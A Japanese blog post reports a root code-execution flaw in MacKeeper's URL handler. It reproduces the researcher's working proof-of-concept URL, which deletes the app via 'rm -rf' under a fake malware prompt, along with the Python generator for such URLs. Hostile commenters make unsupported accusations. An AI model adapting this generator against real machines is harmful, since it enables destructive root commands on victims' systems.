Mac用ユーティリティアプリ「MacKeeper」にURLスキームを介してOS Xにroot認証要求し任意のコードを実行させる脆弱性が発見されたそうです。詳細は以下から。
色々と話題のMacのユーティリティアプリ「MacKeeper」ですが、このMacKeeperに脆弱性が発見されたとiMoreやThe Safe Mac, SecureMacなどが報じています。
MacKeeper sports critical security flaw, warns researcher
Serious MacKeeper vulnerability found – http://t.co/vNL5deQylH
注:「MacKeeperはマルウェアだ」とも書かれていますが、今回はそのへんの話は省きます
脆弱性
この脆弱性を発見したのはセキュリティ研究者のBraden Thomasさんで、内容は「MacKeeperにはURLを介してOS Xにユーザー認証を求め、その後 任意のコードをroot権限で実行させる脆弱性がある」というもので、ThomasさんはこのPoC(Proof-of-Concept)をTwitterに投稿し注意を促しています。
MacKeeper permits URLs to run arbitrary commands as root, given the user’s authorization (or a previous authorization).
So, feel free to share this PoC around: http://t.co/zYW4z7RIFd. Runs &vquot;rm -rf /Applications/MacKeeper.app&vquot;. Source: http://t.co/4sHg2dH6Ca
Security researcher Braden Thomas has discovered a serious flaw in the way MacKeeper handles custom URLs that allows arbitrary commands to be run as root with little to no user interaction required. Mr. Thomas released a proof-of-concept (POC) demonstrating how visiting a specially crafted webpage in Safari causes the affected system to execute arbitrary commands – in this case, to uninstall MacKeeper. This flaw appears to be caused by a lack of input validation by MacKeeper when executing commands using its custom URL scheme.
[MacKeeper URL handler remote code execution vulnerability and proof-of-concept (Zero-Day) – SecureMac]
実際に試してみた
ThomasさんのPoCは、以下のURLを短縮URLにしてユーザーに開かせることで、MacKeeperにユーザー認証を促すことが出来るというもので、
com-zeobit-command:///i/ZBAppController/performActionWithHelperTask: arguments:/ BAtzdHJlYW10eXBlZIHoA4QBQISEhAhOU1N0cmluZwGEhAhOU09iamVjdACFhAErBk5TVGFz a4aShISEDE5TRGljdGlvbmFyeQCUhAFpA5KEk5UJQVJHVU1FTlRThpKEhIQHTlNBcnJheQCU lwKShJOVAi1jhpKEk5U4cm0gLXJmIC9BcHBsaWNhdGlvbnMvTWFjS2VlcGVyLmFwcDtwa2ls bCAtOSAtYSBNYWNLZWVwZXKGhpKEk5UGUFJPTVBUhpKEk5UzWW91ciBjb21wdXRlciBoYXMg bWFsd2FyZSB0aGF0IG5lZWRzIHRvIGJlIHJlbW92ZWQuhpKEk5ULTEFVTkNIX1BBVEiGkoST lQcvYmluL3NohoY=
実際にMacKeeperをインストールしたMacでURLを開いてみたところ、確かにMacKeeperが起動しユーザー認証を求められました。
[Gif Anime]
この後、管理者パスワードを入力するとroot権限で任意のコード(ここでは”rm -rf”でMacKeeper.appを削除する様ですが、VMにクリーンインストールされたYosemiteの環境では実行されませんでした)が実行されるそうで、ThomasさんはこのPoCのソースコードを公開し注意を呼びかけていますが、
import sys,base64 from Foundation import * RUN_CMD = "rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper" d = NSMutableData.data() a = NSArchiver.alloc().initForWritingWithMutableData_(d) a.encodeValueOfObjCType_at_("@",NSString.stringWithString_("NSTask")) a.encodeValueOfObjCType_at_("@",NSDictionary.dictionaryWithObjectsAndKeys_(NSString.stringWithString_("/bin/sh"),"LAUNCH_PATH",NSArray.arrayWithObjects_(NSString.stringWithString_("-c"),NSString.stringWithString_(RUN_CMD),None),"ARGUMENTS",NSString.stringWithString_("Your computer has malware that needs to be removed."),"PROMPT",None)) print "com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/"+base64.b64encode(d)
MacKeeper側もこの脆弱性を確認し直ちに修正するとツイートしているので、どうしてもMacKeeperが使いたい方はこの脆弱性が修正されるまでは使用を控えたほうがよさそうです。
@drspringfield Hi and thanks for flagging this up.
We are working on the resolution of this issue and set its priority to the highest level.
関連リンク:
・MacKeeper has critical security flaw, says researcher – iMore
・Serious MacKeeper vulnerability found – The Safe Mac
・MacKeeper URL handler remote code execution vulnerability – SecureMac
コメント
情弱御用達ツールだろ
こいら訴えられないの?
いつも邪魔な広告うざいけど
>>1 情弱御用達ツールだろ
わろた
mackeeperってpornサイトから飛ばされてインスコしろって表示されるマルウェアだろ
これわざとだろ
見つかれば「脆弱性です〜直します〜ごめんなさい〜見つけてくれた人ありがと〜」ってごまかせるという確信犯
最低だよなぁ
これわりと普通に入れてる人いるよね
コンプライアンス的に誠実さの感じられないメーカだし
知ってて黙ってたんじゃないって勘ぐられても仕方ないねぇ
まあ広告がウザイのは最適化された際にMacの広告主が少ないからってのもあるんだろうけどw
こいつは一旦入れて、削除すると、「本当に削除するの?それならただで上げるよ!」と
永久ライセンスをくれるよく分からないアプリ。